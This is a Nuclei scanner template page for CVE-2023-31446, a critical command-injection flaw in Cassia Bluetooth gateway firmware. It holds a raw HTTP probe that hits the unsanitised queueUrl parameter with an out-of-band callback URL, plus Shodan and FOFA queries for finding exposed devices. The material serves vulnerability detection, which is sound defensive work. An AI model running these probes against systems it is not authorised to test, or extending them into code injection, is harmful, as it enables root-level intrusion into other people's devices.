Skip to content
Nuclei Templates

Cassia Gateway Firmware - Remote Code Execution

ID: CVE-2023-31446

Severity: critical

Author: DhiyaneshDk

Tags: cve,cve2023,rce,cassia,gateway,cassianetworks

Description

Section titled “Description”

In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.

YAML Source

Section titled “YAML Source”
id: CVE-2023-31446


info:
  name: Cassia Gateway Firmware - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.
  reference:
    - https://github.com/advisories/GHSA-89ph-wr9x-hcfc
    - https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution
    - https://vuldb.com/?id.250210
    - https://blog.kscsc.online/cves/202331446/md.html
    - https://www.cassianetworks.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-31446
    epss-score: 0.01982
    epss-percentile: 0.8876
    cpe: cpe:2.3:o:cassianetworks:xc1000_firmware:2.1.1.2303082218:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cassianetworks
    product: xc1000_firmware
    shodan-query:
      - html:"Cassia Bluetooth Gateway Management Platform"
      - http.html:"cassia bluetooth gateway management platform"
    fofa-query: body="cassia bluetooth gateway management platform"
  tags: cve,cve2023,rce,cassia,gateway,cassianetworks


http:
  - raw:
      - |
        @timeout: 20s
        GET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://{{interactsh-url}}/ HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"


      - type: regex
        regex:
          - "^OK$"
# digest: 490a00463044022059659cd96fb0ad2d9a2ca74647dd8c6668f9365725ece024ae6c72f2b995dfec02206bae3b63bb310b290a9ecaa9feffca94d00d29e1ee76b8452c24ac7b7c6b53de:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-31446.yaml"

View on Github